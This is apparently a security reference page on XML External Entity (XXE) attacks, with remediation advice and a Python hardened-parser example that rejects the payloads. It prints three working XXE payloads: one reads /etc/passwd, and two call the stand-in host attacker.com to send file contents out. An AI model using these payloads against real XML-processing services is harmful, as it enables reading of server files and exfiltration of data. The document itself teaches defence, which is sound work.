XML External Entity (XXE)

Description

XML External Entity (XXE) vulnerabilities arise when an application processes XML input that includes references to external entities. By manipulating these external entity declarations, attackers can read local files, initiate network requests from the server, or in more severe cases, achieve remote code execution. XXE typically exploits parsing libraries or features in XML processors that automatically retrieve external resources without sufficient validation or restriction.

These attacks are particularly dangerous because XML parsers, by default, may expand entities, download remote content, or even parse system files. If an attacker can control or supply XML data (e.g., via file uploads or API calls), and the server does not securely configure its XML parser, the attacker can exploit XXE to exfiltrate sensitive data or interact with internal services.

Examples

Classic XXE Payload

A typical XXE attack might embed a DOCTYPE declaration that references a system file:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

When an insecure XML parser processes this, it attempts to read /etc/passwd from the server's file system, then includes its content in the parsed output. The attacker can thereby access sensitive local files.

Blind XXE Over HTTP

Attackers can force an XML parser to load an external resource from a remote server they control:

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://attacker.com/secret?file=/etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

Even if the application's response never returns the entity's content, the attacker's server observes an incoming request from the target. That out-of-band signal confirms the parser resolves external entities and that the server can make outbound connections; the query string in this payload is a fixed marker, and leaking actual file contents through such a request requires combining it with parameter entities, as in the next example. Unexpected outbound HTTP requests from XML-processing services are therefore a useful detection signal.

Parameter Entity Injection

Some XML parsers allow parameter entities (declared with a % prefix) in the DTD, which can be used to assemble a second entity declaration that embeds the contents of a local file into an outbound URL:

<!DOCTYPE root [
  <!ENTITY % file SYSTEM "file:///etc/hostname">
  <!ENTITY % eval "<!ENTITY exfil SYSTEM 'http://attacker.com/?host=%file;'>">
  %eval;
]>
<root>&exfil;</root>

This sequence makes the parser send a request carrying the server's hostname to an external URL controlled by the attacker.

Remediation

  1. Disable External Entity Resolution

    • Configure the XML parser to disallow or ignore external entities.
    • For example, in Java, disallow DOCTYPE declarations (the http://apache.org/xml/features/disallow-doctype-decl feature) and set XMLConstants.FEATURE_SECURE_PROCESSING to true; note that the latter on its own only limits entity expansion and does not stop external entity resolution.
    • Each language or parser typically offers parameters or flags to turn off external entity expansion.
  2. Use Less Complex Data Formats

    • Where possible, avoid using XML and its complex features.
    • Consider JSON or other formats that do not include entity expansion by default, reducing attack surface.
  3. Implement Whitelisting and Validation

    • If external entities are strictly required, configure a whitelist of allowed resources or schemas.
    • Validate XML input against a secure schema that disallows external references.
  4. Enforce Least Privilege and Sandboxing

    • Run the application with minimal file system and network privileges so that even if XXE is attempted, it has limited access to files or internal endpoints.
    • Use containerization or chroot environments to restrict the application's view of the file system.
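The following is an added example, not code from the original page: a Python front end built on the standard library's expat bindings that implements remediation step 1 (refuse any DOCTYPE, or at least refuse any entity declared with a SYSTEM or PUBLIC identifier) and runs the three payloads from the Examples section through it, alongside two benign documents constructed here. The class and function names (XXEAttemptError, parse_xml_hardened, check_document) are this example's own. Because the policy is enforced at the declaration, the parser never reaches the point of opening a file or making a request.

```python
# Added example (not from the original page): stdlib-only hardened XML parsing that
# enforces remediation step 1 and is exercised against the payloads shown above.
import xml.parsers.expat as expat


class XXEAttemptError(ValueError):
    """The document declared a DOCTYPE or external entity that policy forbids."""


def parse_xml_hardened(xml_bytes, allow_doctype=False):
    """Parse xml_bytes and return {leaf_tag: text}.

    allow_doctype=False (default): any <!DOCTYPE> aborts parsing ("disable DTDs").
    allow_doctype=True: internal entities are tolerated, but an entity declared with
        a SYSTEM or PUBLIC identifier (external general or parameter entity) aborts
        parsing before expat could ever try to resolve it.
    """
    parser = expat.ParserCreate()
    result, stack = {}, []

    def start_doctype(name, system_id, public_id, has_internal_subset):
        if not allow_doctype:
            raise XXEAttemptError("DOCTYPE declaration for <%s> not permitted" % name)
        if system_id is not None or public_id is not None:
            raise XXEAttemptError("external DTD %r not permitted" % (system_id or public_id))

    def entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # Fires for every <!ENTITY ...> in the internal subset, parameter entities included.
        if system_id is not None or public_id is not None:
            kind = "parameter" if is_param else "general"
            raise XXEAttemptError("external %s entity %r -> %r" % (kind, name, system_id or public_id))

    def external_entity_ref(context, base, system_id, public_id):
        # Defence in depth: refuse anything expat still asks us to resolve.
        raise XXEAttemptError("external entity reference to %r blocked" % system_id)

    def start_element(tag, attrs):
        stack.append((tag, []))

    def char_data(data):
        if stack:
            stack[-1][1].append(data)

    def end_element(tag):
        _, chunks = stack.pop()
        text = "".join(chunks).strip()
        if text:
            result[tag] = text

    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.StartElementHandler = start_element
    parser.CharacterDataHandler = char_data
    parser.EndElementHandler = end_element
    parser.Parse(xml_bytes, True)
    return result


def check_document(xml_bytes, allow_doctype=False):
    """Non-raising wrapper for logging: ('accepted', data) or ('rejected'|'malformed', reason)."""
    try:
        return "accepted", parse_xml_hardened(xml_bytes, allow_doctype)
    except XXEAttemptError as exc:
        return "rejected", str(exc)
    except expat.ExpatError as exc:
        return "malformed", str(exc)


# The three payloads from the Examples section, plus two benign documents constructed
# here to show what the policy still accepts.
CLASSIC_PAYLOAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>"""
BLIND_PAYLOAD = b"""<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://attacker.com/secret?file=/etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>"""
PARAM_PAYLOAD = b"""<!DOCTYPE root [
  <!ENTITY % file SYSTEM "file:///etc/hostname">
  <!ENTITY % eval "<!ENTITY exfil SYSTEM 'http://attacker.com/?host=%file;'>">
  %eval;
]>
<root>&exfil;</root>"""
SAFE_DOC = b"<root><data>hello</data></root>"
INTERNAL_ENTITY_DOC = b'<!DOCTYPE root [<!ENTITY company "ACME">]><root><name>&company; Corp</name></root>'

if __name__ == "__main__":
    for label, doc in [("classic", CLASSIC_PAYLOAD), ("blind", BLIND_PAYLOAD),
                       ("parameter", PARAM_PAYLOAD), ("safe", SAFE_DOC),
                       ("internal-entity", INTERNAL_ENTITY_DOC)]:
        print(label, "strict:", check_document(doc))
        print(label, "doctype-allowed:", check_document(doc, allow_doctype=True))
```

In the default strict mode every document carrying a DOCTYPE is refused, which is the simplest and most robust posture. The allow_doctype=True mode exists for applications that genuinely depend on internal entities: it still blocks the classic, blind and parameter-entity payloads at their declarations, while the constructed document that only uses an internal entity parses normally.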